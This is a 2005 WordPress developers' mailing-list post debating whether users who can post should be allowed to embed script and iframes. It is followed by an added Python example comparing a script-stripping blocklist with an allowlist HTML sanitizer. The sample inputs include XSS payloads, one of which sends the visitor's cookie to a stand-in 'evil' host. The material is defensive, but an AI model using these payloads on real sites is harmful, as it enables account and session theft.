[wp-hackers] Security Vulnerability found - Forum Pos
amit at igeek.info
Wed Apr 13 17:42:28 GMT 2005
"Mike Little" <journalized at gmail.com>
> In my opinion, this isn't as much of a threat to WordPress as it
> In essence, the 'exploit' is that a registered user with posting
> iframe be visible in any reader's browser!
> That's right. It's a blogging system. It's a simplified CMS. It would
> be a pretty poor one without HTML.
> In other words if you trust someone, including yourself, to post
> stories on your blog then you have to trust that they won't do anything
> I don't see that that is any different from any situation where you
> allow someone trusted to put content on your site.
That's correct & I support it. If you don't trust anyone, then don't give them the rights to POST. It's as simple as that!!
"John Sinteur" <john at sinteur.com>
> Consider this scenario:
> on a weblog, "options - general" the owner has checked: "anyone can
> in "options - writing" the owner has checked "Newly registered members:
> May submit drafts for review" (or worse "May publish articles" but
> let's forget about that for now)
> attempts to steal the admin cookie.
> Owner logs on, sees a new draft, clicks on it to view, and has just
> lost his weblog.
I'd say, if you want anyone to register & post on your blog, then there should be an option to disable the <script> tags etc. But disabling them by default & not having the option to enable them will be very restricting.
|| Canned!! -- my Atropine || iG:Syntax Hiliter v2.01 ||
|| iGEEK.INFO || Free Nokia Ringtones || Online Gaming @ Games Planet ||
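The two positions in this thread (strip <script> as an option vs. trust anyone who can post) are easier to weigh with the mechanics in front of you. The following is an added example, not code from this post or from WordPress: it puts a naive "disable <script> tags" filter next to an allowlist sanitizer of the kind the second camp would want, and runs both over the sort of payloads John's scenario relies on (a cookie-stealing script, an event-handler attribute, a javascript: link, an iframe). The tag/attribute allowlist, the function names and the sample posts are all the example's own assumptions, not any WordPress setting or API.

```python
"""Blocklist vs. allowlist filtering of user-submitted post HTML.

Added example for illustration only (not WordPress code). The allowed
tag/attribute sets below are an assumption chosen for a plain blog post;
a real deployment would tune them.
"""
import re
from html import escape
from html.parser import HTMLParser

# Assumed allowlist: what a blog author needs for formatting, nothing that
# executes script or loads third-party documents.
ALLOWED_TAGS = {"p", "br", "a", "b", "i", "em", "strong", "ul", "ol", "li",
                "blockquote", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
VOID_TAGS = {"br"}
SAFE_SCHEMES = ("http://", "https://", "mailto:")

# The "just disable <script>" approach: remove <script>...</script> and nothing else.
SCRIPT_RE = re.compile(r"<script\b.*?</script\s*>", re.IGNORECASE | re.DOTALL)


def strip_script_tags_only(html):
    """Blocklist filter. Misses event handlers, javascript: URLs, iframes."""
    return SCRIPT_RE.sub("", html)


def safe_url(value):
    """Accept relative URLs and a few known schemes; reject everything else."""
    v = "".join(ch for ch in (value or "").strip().lower() if ch > " ")
    if ":" not in v:          # relative URL, no scheme at all
        return True
    return v.startswith(SAFE_SCHEMES)


class AllowlistSanitizer(HTMLParser):
    """Rebuilds the document from allowed tags/attributes only; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []
        self.skipping = False   # inside <script>/<style>: drop the text too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping = True
            return
        if self.skipping or tag not in ALLOWED_TAGS:
            return              # unknown tag is dropped, its text content is kept
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue        # covers every on* handler, style, src, ...
            if name == "href" and not safe_url(value):
                continue
            kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skipping = False
            return
        if self.skipping or tag not in self.open_tags:
            return
        while self.open_tags:   # close down to the matching tag: output stays well-formed
            t = self.open_tags.pop()
            self.out.append(f"</{t}>")
            if t == tag:
                break

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data, quote=False))

    def result(self):
        self.out.extend(f"</{t}>" for t in reversed(self.open_tags))
        return "".join(self.out)


def sanitize(html):
    p = AllowlistSanitizer()
    p.feed(html)
    p.close()
    return p.result()


# Constructed sample posts, modelled on the scenario discussed in the thread.
SAMPLE_POSTS = [
    "<p>Hello <script>document.location='http://evil/?c='+document.cookie</script>world</p>",
    '<img src=x onerror="alert(1)">',
    '<a href="javascript:alert(1)">click</a>',
    '<iframe src="http://evil/"></iframe>',
    '<a href="https://wordpress.org/" title="WP">WP</a>',
]

if __name__ == "__main__":
    for post in SAMPLE_POSTS:
        print("blocklist:", strip_script_tags_only(post))
        print("allowlist:", sanitize(post))
```

Run over the constructed posts, the blocklist only handles the first one; the `onerror` handler, the `javascript:` link and the iframe pass through unchanged, while the allowlist reduces them to harmless text and keeps the ordinary link intact. Whichever filter is chosen, it has to run on whatever the owner sees when previewing a submitted draft, not only on published posts, since the draft review step is exactly where the scenario above fires.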